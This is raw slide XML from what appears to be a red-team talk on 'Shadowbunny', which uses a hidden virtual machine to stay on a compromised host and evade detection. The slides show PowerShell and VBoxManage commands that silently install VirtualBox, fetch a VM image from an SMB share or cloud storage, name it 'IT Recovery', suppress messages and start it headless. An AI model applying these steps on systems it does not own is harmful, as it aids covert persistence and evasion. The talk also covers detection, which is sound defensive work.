            <a:ext cx="1869141" cy="68942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C8FF6363-9F63-4E5E-833E-EC5395CC1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38" y="5019468"/>
            <a:ext cx="1382395" cy="574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EDFEBB-8A0C-4F6A-B111-F3A6441C7DC6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9337646" y="5091864"/>
            <a:ext cx="15946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KVM</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16160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3AC5F-62CB-4910-B023-CB5A9A01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virtualization software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6817F-FD4E-4166-81DD-521AADEEC231}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="425823" y="2426240"/>
            <a:ext cx="11228294" cy="12100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Invoke-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WebRequest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"https://download.virtualbox.org/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virtualbox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/6.1.8/VirtualBox-6.1.8-</a:t>
            </a:r>
            <a:b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137981-Win.exe" -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OutFile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env:TEMP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\VirtualBox-6.1.8-137981-Win.exe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166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7095-FA11-4AE1-9329-3FC940E5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VirtualBox: Installation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8E647-EE2E-4677-9B1E-628C9F08A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E7165-99CB-4FAF-ADC8-FE02872C1A3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="499544" y="2385206"/>
            <a:ext cx="11192911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VirtualBox-6.0.14-133895-Win.exe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1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--silent 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b="1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--ignore-reboot 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msiparams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VBOX_INSTALLDESKTOPSHORTCUT=0,</a:t>
            </a:r>
          </a:p>
          <a:p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VBOX_INSTALLQUICKLAUNCHSHORTCUT=0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US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65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50E86-37F4-4C16-AE2E-FE9689BF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5941A-0ED9-4076-B54D-ACEA648B0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1F7F3-C2A4-4DE0-88D0-AABFE17BDD54}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect t="11646" r="24985"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="536207" y="1899516"/>
            <a:ext cx="11119586" cy="3522230"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="254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767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41E0-15CF-4B69-898E-94909B73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466C6-6F37-4B9C-8D53-670AD1D52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9059F-096D-4A78-9F0C-09F8E03C9B96}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1105308" y="2551837"/>
            <a:ext cx="9365875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800" dirty="0"/>
              <a:t>VBoxManage.exe list </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>vms</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>VBoxManage.exe list </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>runningvms</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>VBoxManage.exe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>startvm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VBoxManage.exe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>setextradata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> global GUI/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>SuppressMessages</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> "all"</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3288321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334FC-2D65-4F4E-AE06-9250AA20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Alternative: Enabling Hyper-V on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62506-11C6-43E3-A595-60E0B0EB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Via PowerShell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Via Deployment Image and Servicing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9596C-73FD-4551-8BF4-BD55F54D46E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1203511" y="4733723"/>
            <a:ext cx="9784977" cy="6815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6858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2pPr>
            <a:lvl3pPr marL="11430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lvl4pPr>
            <a:lvl5pPr marL="20574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sz="400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>  DISM /Online /Enable-Feature /All /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>FeatureName:Microsoft-Hyper-V</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="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76DDE-ADE5-425F-AA59-0B11D773CE82}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1203511" y="2377877"/>
            <a:ext cx="9784977" cy="11349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6858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2pPr>
            <a:lvl3pPr marL="11430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lvl4pPr>
            <a:lvl5pPr marL="20574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br>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>  Enable-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>WindowsOptionalFeature</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> -Online </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>                                -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>FeatureName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> Microsoft-Hyper-V </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>                                –All</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0"/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87917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9ADF-8E9B-4456-9324-057E967D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527DC3-AE87-4C20-9FFC-288BEA416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132" y="2642278"/>
            <a:ext cx="10515600" cy="260211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C7524-3523-4575-B760-A09C97988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6" r="26978" b="93261"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="892132" y="1858587"/>
            <a:ext cx="10407734" cy="3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87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41E0-15CF-4B69-898E-94909B73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PowerShell Hyper-V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466C6-6F37-4B9C-8D53-670AD1D52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0915A-04B9-44A8-9BD7-E2CB23425714}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1203511" y="2487332"/>
            <a:ext cx="9784977" cy="18833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6858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2pPr>
            <a:lvl3pPr marL="11430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lvl4pPr>
            <a:lvl5pPr marL="2057400" marR="0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br>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> New-VM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> Get-VM </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> Start-VM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> …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97241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44BF-EBC6-41F6-8EAE-CBBB04B4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Agenda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F035D4-78C7-4198-BCF6-0C7E89F1B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Shadowbunny</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Why red teams should use them</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Deep-dive into the TTP (setup, configuration and considerations)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Detections and threat hunting ideas</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Wrap up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97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298D4A-8071-403E-9222-901C83DD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126" y="2425566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Downloading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the VM Image</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19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7AE41C-F186-4711-A994-C88E2DBC4703}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="788685" y="1629090"/>
            <a:ext cx="2943130" cy="3620021"/>
            <a:chOff x="5396778" y="2551779"/>
            <a:chExt cx="1120588" cy="1378312"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="4" name="Graphic 3" descr="Bunny face">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0FE4A77F-AE19-484E-804E-2FC01E19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28451" y="2551779"/>
              <a:ext cx="657250" cy="657250"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="6" name="Graphic 5" descr="Download from cloud">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2317BE0F-F694-41BE-AE4B-2A7A3A7C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20934" y="3264724"/>
              <a:ext cx="472285" cy="472285"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="7" name="Graphic 10" descr="Internet">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0322A47-00B2-4B79-AE0D-BFF92DD80200}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5396778" y="3203049"/>
              <a:ext cx="1120588" cy="727042"/>
              <a:chOff x="3570431" y="3314699"/>
              <a:chExt cx="876300" cy="533400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1940D05-8378-4191-8EC5-913B9E5203CE}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3684731" y="3314699"/>
                <a:ext cx="647700" cy="438150"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 590550 w 647700"/>
                  <a:gd name="connsiteY0" fmla="*/ 381000 h 438150"/>
                  <a:gd name="connsiteX1" fmla="*/ 57150 w 647700"/>
                  <a:gd name="connsiteY1" fmla="*/ 381000 h 438150"/>
                  <a:gd name="connsiteX2" fmla="*/ 57150 w 647700"/>
                  <a:gd name="connsiteY2" fmla="*/ 57150 h 438150"/>
                  <a:gd name="connsiteX3" fmla="*/ 590550 w 647700"/>
                  <a:gd name="connsiteY3" fmla="*/ 57150 h 438150"/>
                  <a:gd name="connsiteX4" fmla="*/ 647700 w 647700"/>
                  <a:gd name="connsiteY4" fmla="*/ 38100 h 438150"/>
                  <a:gd name="connsiteX5" fmla="*/ 609600 w 647700"/>
                  <a:gd name="connsiteY5" fmla="*/ 0 h 438150"/>
                  <a:gd name="connsiteX6" fmla="*/ 38100 w 647700"/>
                  <a:gd name="connsiteY6" fmla="*/ 0 h 438150"/>
                  <a:gd name="connsiteX7" fmla="*/ 0 w 647700"/>
                  <a:gd name="connsiteY7" fmla="*/ 38100 h 438150"/>
                  <a:gd name="connsiteX8" fmla="*/ 0 w 647700"/>
                  <a:gd name="connsiteY8" fmla="*/ 438150 h 438150"/>
                  <a:gd name="connsiteX9" fmla="*/ 647700 w 647700"/>
                  <a:gd name="connsiteY9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7700" h="438150">
                    <a:moveTo>
                      <a:pt x="590550" y="381000"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="57150" y="381000"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57150" y="57150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="590550" y="57150"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="647700" y="38100"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="647700" y="17058"/>
                      <a:pt x="630642" y="0"/>
                      <a:pt x="609600" y="0"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="38100" y="0"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="17058" y="0"/>
                      <a:pt x="0" y="17058"/>
                      <a:pt x="0" y="38100"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="0" y="438150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="647700" y="43815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90235D0-218E-4E83-8595-E3D59F915EFE}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3570431" y="3790949"/>
                <a:ext cx="876300" cy="57150"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 495300 w 876300"/>
                  <a:gd name="connsiteY0" fmla="*/ 0 h 57150"/>
                  <a:gd name="connsiteX1" fmla="*/ 495300 w 876300"/>
                  <a:gd name="connsiteY1" fmla="*/ 9525 h 57150"/>
                  <a:gd name="connsiteX2" fmla="*/ 486957 w 876300"/>
                  <a:gd name="connsiteY2" fmla="*/ 19050 h 57150"/>
                  <a:gd name="connsiteX3" fmla="*/ 485775 w 876300"/>
                  <a:gd name="connsiteY3" fmla="*/ 19050 h 57150"/>
                  <a:gd name="connsiteX4" fmla="*/ 390525 w 876300"/>
                  <a:gd name="connsiteY4" fmla="*/ 19050 h 57150"/>
                  <a:gd name="connsiteX5" fmla="*/ 381000 w 876300"/>
                  <a:gd name="connsiteY5" fmla="*/ 10707 h 57150"/>
                  <a:gd name="connsiteX6" fmla="*/ 381000 w 876300"/>
                  <a:gd name="connsiteY6" fmla="*/ 9525 h 57150"/>
                  <a:gd name="connsiteX7" fmla="*/ 381000 w 876300"/>
                  <a:gd name="connsiteY7" fmla="*/ 0 h 57150"/>
                  <a:gd name="connsiteX8" fmla="*/ 0 w 876300"/>
                  <a:gd name="connsiteY8" fmla="*/ 0 h 57150"/>
                  <a:gd name="connsiteX9" fmla="*/ 0 w 876300"/>
                  <a:gd name="connsiteY9" fmla="*/ 19050 h 57150"/>
                  <a:gd name="connsiteX10" fmla="*/ 38100 w 876300"/>
                  <a:gd name="connsiteY10" fmla="*/ 57150 h 57150"/>
                  <a:gd name="connsiteX11" fmla="*/ 838200 w 876300"/>
                  <a:gd name="connsiteY11" fmla="*/ 57150 h 57150"/>
                  <a:gd name="connsiteX12" fmla="*/ 876300 w 876300"/>
                  <a:gd name="connsiteY12" fmla="*/ 19050 h 57150"/>
                  <a:gd name="connsiteX13" fmla="*/ 876300 w 876300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6300" h="57150">
                    <a:moveTo>
                      <a:pt x="495300" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="495300" y="9525"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="495627" y="14459"/>
                      <a:pt x="491891" y="18723"/>
                      <a:pt x="486957" y="19050"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="486564" y="19076"/>
                      <a:pt x="486168" y="19076"/>
                      <a:pt x="485775" y="19050"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="390525" y="19050"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="385591" y="19377"/>
                      <a:pt x="381327" y="15641"/>
                      <a:pt x="381000" y="10707"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="380974" y="10314"/>
                      <a:pt x="380974" y="9918"/>
                      <a:pt x="381000" y="9525"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="381000" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="19050"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="40092"/>
                      <a:pt x="17058" y="57150"/>
                      <a:pt x="38100" y="57150"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="838200" y="57150"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="859242" y="57150"/>
                      <a:pt x="876300" y="40092"/>
                      <a:pt x="876300" y="19050"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="8763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4063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B29226-13D9-4CE5-B9D0-C82F16EE1447}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838199" y="2052918"/>
            <a:ext cx="99015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1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>or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3AC5F-62CB-4910-B023-CB5A9A01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the image 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6817F-FD4E-4166-81DD-521AADEEC231}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838199" y="2208786"/>
            <a:ext cx="9901519" cy="6802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Copy-Item \\smbserver\images\shadowbunny.vhd `</a:t>
            </a:r>
            <a:b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	$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env:USERPROFILE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\VirtualBox\IT Recovery\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shadowbunny.vhd</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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D664B-E698-4BBA-AE1B-B4D3A4212B20}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838199" y="5003868"/>
            <a:ext cx="106455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Other options include loading files from databases, git, Cloud SMB, a combination,… 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F8E3A-C257-439D-BBF9-124EB197E193}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838199" y="3627299"/>
            <a:ext cx="9901519" cy="14781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Invoke-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WebRequest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"https://blog.storage.azure.com/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somelocation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`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-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OutFile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env:USERPROFILE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\Virtual Box\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IT Recovery\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shadowbunny.vhd</a:t>
            </a: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" name="Graphic 8" descr="Download from cloud">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A66C70C3-6FFC-4E0F-8BC5-786D20998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0500" y="244841"/>
            <a:ext cx="1240417" cy="124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77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E07A41-59CF-4BE1-8749-C7111808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126" y="24793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Configuration</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3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Gears">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C8E758C-853E-4C41-89C7-2F486CF7A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89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4BCC-89E8-4DC2-BD82-5FF7D610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VBoxManage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6874-36C2-45D4-AE6E-F8C805D9B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FEFD0-6609-4A64-B949-7060C99DC5A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="2263278"/>
            <a:ext cx="10717306" cy="31765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PS &gt;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= "IT Recovery“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PS &gt;.\VBoxManage.exe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createvm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--name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ostype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"Ubuntu" –register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Virtual machine 'IT Recovery' is created and registered.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UUID: 7891a2bd-e9cc-432a-ae2a-ba1fb2de96a4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Settings file: 'C:\Users\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wuzzi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\VirtualBox VMs\IT Recovery\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1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Recovery.vbox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75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3459-1C8F-4F14-985A-779C3922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76182-DAB8-4B3A-90BA-02DF85F62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E0971-9C17-4DCD-AF70-71F4B19CD647}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="2262054"/>
            <a:ext cx="10515600" cy="31765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.\VBoxManage.exe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modifyvm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ioapic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on  # required for 64bit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.\VBoxManage.exe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modifyvm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--memory 1024 --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vram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128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.\VBoxManage.exe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modifyvm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--nic1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nat</a:t>
            </a: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.\VBoxManage.exe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modifyvm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--audio none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.\VBoxManage.exe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modifyvm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graphicscontroller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vmsvga</a:t>
            </a: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.\VBoxManage.exe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modifyvm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--description "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hadowbunny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64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DA84-5CB8-4B01-8A52-907CD464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53" y="356760"/>
            <a:ext cx="10515600" cy="1213376"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Mounting previously downloaded </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>vhd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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4D249-C8E0-43FE-B0DE-227FFCB7A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953" y="1817259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36492-57E4-4521-B121-0AFFCF9D061B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="900953" y="2262165"/>
            <a:ext cx="10515600" cy="34615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.\VBoxManage.exe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storagectl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–name "SATA Controller" –add </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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sata</a:t>
            </a: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.\VBoxManage.exe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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storageattach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–comment "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Shadowbunny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Disk" </a:t>
            </a:r>
            <a:b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–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storagectl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"SATA Controller" </a:t>
            </a:r>
            <a:b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–type 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hdd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–medium "$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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env:USERPROFILE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\VirtualBox VMs\IT Recovery\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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shadowbunny.vhd</a:t>
            </a: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         </a:t>
            </a:r>
            <a:b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–port 0</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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61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2FA2-9E29-41EE-A55C-C6CC8D24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3DF13-53CF-4FA3-A31A-680FDE4A0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19AB4-8A8A-4C90-AAED-2685E5023BA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/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1504081" y="1133039"/>
            <a:ext cx="9183838" cy="459192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0368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CFFC-4483-45A0-933E-02EDEA29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Launching the VM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B635-7872-48D5-84CC-F6097DFE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2" y="1825477"/>
            <a:ext cx="10515600" cy="4351338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Voila, now it’s time to start the VM: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8D0F4030-310E-4999-B687-4C674F120068}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="708211" y="2816077"/>
            <a:ext cx="10170460" cy="23786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PS &gt; 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.\VBoxManage.exe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startvm</a:t>
            </a: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"IT Recovery" –type headless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Waiting for VM "IT Recovery" to power on… </a:t>
            </a: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 "IT Recovery " has been successfully started.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98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73FF1-4F80-41B4-83F4-75902B591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873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4FC5619-8A7B-440F-9581-A7538DFA7E47}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7632837" y="4177553"/>
            <a:ext cx="704950" cy="1272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2088EE9-656F-40C8-B7B7-0DE5F0078864}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6261845" y="5504827"/>
            <a:ext cx="1909483" cy="833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26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334FC-2D65-4F4E-AE06-9250AA20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Alternative: Using Hyper-V on Windows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4C2F4C51-2EE9-4B9D-9CF5-370437B94E15}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="936812" y="1785137"/>
            <a:ext cx="9049870" cy="32199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00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$VM = "IT Recovery"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New-VM -Name $VM</a:t>
            </a:r>
            <a:b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-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MemoryStartupBytes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2147483648 </a:t>
            </a:r>
            <a:b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-Generation 2 </a:t>
            </a:r>
            <a:b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-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VHDPath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"C:\Users\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i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\Virtual Hard Disks\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shadowbunny.vhdx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b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-Path "C:\Users\All Users\Documents\Hyper-V\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shadowbunny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b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-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SwitchName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(Get-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VMSwitch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).Name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Set-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="16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VMFirmware</a:t>
            </a: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$VM -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="16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EnableSecureBoot</a:t>
            </a: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Off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cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> Start-VM $VM</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="16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900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/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0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C7B4-5821-4D70-8431-3EC21EDE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Shadowbunny</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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5B6F3F-4A43-42C2-88BB-E579F3BCE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9" t="53948" r="32333" b="18244"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1299777" y="2361575"/>
            <a:ext cx="9350294" cy="2442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730D3F-44C0-4A87-B14D-956FC92B333F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8629790" y="4803834"/>
            <a:ext cx="226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urbandictionary.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4194723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FD98-B9B3-4B73-BE49-A725218F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58529-2DEC-40CB-90AE-E45483FC2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E9A9F-AD75-46B9-B388-5919C14B50C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825625"/>
            <a:ext cx="10493714" cy="229379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A9248D1-5013-458E-9157-E7E867E58A39}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
